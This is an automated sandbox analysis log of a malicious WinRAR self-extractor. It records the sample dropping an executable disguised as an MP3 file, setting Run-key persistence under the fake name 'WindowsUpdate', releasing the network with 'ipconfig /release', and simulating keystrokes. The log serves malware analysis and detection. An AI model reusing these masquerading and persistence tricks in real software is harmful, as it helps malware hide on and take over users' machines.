Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ngPebbPhbp.exe Static file information: File size 1684188 > 1048576
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ngPebbPhbp.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: ngPebbPhbp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ngPebbPhbp.exe, 00000000.00000000.1695435766.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp, ngPebbPhbp.exe, 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: wkernel32.pdb source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: OpenWith.exe, 0000000F.00000003.1933709794.0000000005990000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1933480930.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: OpenWith.exe, 0000000F.00000003.1934031698.00000000057A0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934260975.0000000005940000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: qwlvpmrupf.mp3, 00000007.00000003.1924745407.000000000113D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000000.1924462508.00000000005C2000.00000002.00000001.01000000.0000000C.sdmp, qwlvpmrupf.mp3.exe, 00000010.00000003.2054601563.000000000182C000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000012.00000003.2185950312.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, qwlvpmrupf.mp3.exe, 00000013.00000003.2271006709.0000000001493000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: OpenWith.exe, 0000000F.00000003.1935175992.00000000059C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934921441.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: OpenWith.exe, 0000000F.00000003.1934628698.00000000058C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.1934512366.00000000057A0000.00000004.00000001.00020000.00000000.sdmp
Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ngPebbPhbp.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00375D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 7_2_00375D78
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6003703 Jump to behavior
Source: ngPebbPhbp.exe Static PE information: section name: .didat
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B26680 push ecx; ret 0_2_00B26693
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Code function: 0_2_00B25773 push ecx; ret 0_2_00B25786
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_003C0330 push edi; ret 7_2_003C0333
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_00390E06 push ecx; ret 7_2_00390E19
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0038DBFE push eax; iretd 7_2_0038DC01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563170 push ecx; iretd 14_2_0556317C
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563130 pushad ; ret 14_2_05563138
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_055651E2 push eax; retf 14_2_055651F1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563C62 push es; retf 14_2_05563C91
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05563C95 push es; retf 14_2_05563C91
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05561F50 push eax; retf 14_2_05561F51
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05565777 push esi; ret 14_2_05565782
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_055637A2 push ebp; iretd 14_2_055637A3
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05564E69 push ebx; iretd 14_2_05564E6A
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 14_2_05565A80 push edx; ret 14_2_05565A81
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03284B00 push edx; ret 15_3_03284B01
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03282D15 push es; retf 15_3_03282D11
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_032821B0 pushad ; ret 15_3_032821B8
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_032821F0 push ecx; iretd 15_3_032821FC
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_032847F7 push esi; ret 15_3_03284802
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03280FD0 push eax; retf 15_3_03280FD1
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03282822 push ebp; iretd 15_3_03282823
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03284262 push eax; retf 15_3_03284271
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03283EE9 push ebx; iretd 15_3_03283EEA
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_3_03282CE2 push es; retf 15_3_03282D11
Source: C:\Windows\SysWOW64\OpenWith.exe Code function: 15_2_05A5FF00 push eax; ret 15_2_05A5FF2E
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DE0332 push edi; ret 16_2_00DE0333
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DB0E06 push ecx; ret 16_2_00DB0E19
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DADC00 push eax; iretd 16_2_00DADC01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF61A3 push CF1CE871h; iretd 17_2_01BF61AA
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Code function: 17_2_01BF602F push D090E871h; iretd 17_2_01BF6036

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3 Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe.exe Jump to dropped file
Source: C:\Users\user\Desktop\ngPebbPhbp.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 File created: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_004025A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 7_2_004025A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Code function: 7_2_0038FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 7_2_0038FC8A
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00E225A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 16_2_00E225A0
Source: C:\Users\user\AppData\Roaming\wlnk\qwlvpmrupf.mp3.exe Code function: 16_2_00DAFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 16_2_00DAFC8A
Source: C:\Users\user\Desktop\ngPebbPhbp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\qwlvpmrupf.mp3 Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
